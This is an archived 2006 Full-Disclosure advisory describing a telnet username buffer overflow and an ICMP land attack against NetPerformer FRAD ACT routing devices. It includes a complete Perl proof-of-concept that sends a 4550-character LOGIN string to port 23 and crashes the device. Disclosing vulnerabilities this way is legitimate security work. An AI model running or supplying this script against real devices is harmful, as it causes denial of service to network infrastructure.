Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14253
HistorySep 13, 2006 - 12:00 a.m.

[Full-disclosure] NetPerformer FRAD ACT Multiple Vulnerabilities

2006-09-1300:00:00
vulners.com
18

NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities

                    .<=[ Arif Jatmoko ]=>.

Release Date : 8 July 2006

Product Affected :

  • NetPerformer FRAD ACT SDM-95xx version 7.xx (R1), earlier, and
    possibly newer
  • NetPerformer FRAD ACT SDM-93xx version 10.x.x (R2), earlier, and
    possibly newer
  • NetPerformer FRAD ACT SDM-92xx version 9.x.x (R1), earlier, and
    possibly newer

Web Site :
www.netperformer.com

=.[DESCRIPTION].=

NetPerformer Frame Relay Access Device (FRAD) is switching & routing device
that support Ethernet and SNA protocols, Voice, etc. This device mainly
used for connecting distributed WAN network through frame relay or ATM
network.

=.[DETAILS].=

  1. Telnet long username Buffer Overflow.
    Passing an overly long username (>4550 char) against telnet service causes
    device to reboot. Successful remote exploitation will possibly allows an
    attacker gaining access into the device.

==================================
00.^.00==================================

__START_CODE

#!/usr/bin/perl

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "23",

Proto => "TCP"))
{
print "Modhiar'000 … killing netperformer … $ARGV[0]
port 23…";
sleep(1);
print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
sleep(1);
print $socket "PASS " . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:23\n";
}

__END_CODE

==================================
00.^.00==================================

  1. ICMP Land Attack
    By sending specially crafted ICMP packets will causes the device to be hang
    up and resetting current TCP handshake connection. In earlier version
    possibly will make device to reboot.

WORKAROUND

No Workaround yet for this vulnerability.

Vendor Response Status :
Vendor response very slow since discovered the above vulnerabilities.

Arif Jatmoko //=.
Information System Security Officer
Coca-Cola Bottling Indonesia


Visit us at www.coca-colabottling.co.id

CAUTION:
This message may contain privileged and confidential information intended only for the use of the addressee named above. If you are not the intended recipient of this message, you are hereby notified that any use, dissemination,distribution, or reproduction of this message is prohibited. If you have received this message in error, please notify Coca-Cola Bottling Indonesia immediately. Any views expressed in this message are those of the individual sender and may not necessarily reflect the views of Coca-Cola Bottling Indonesia.


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/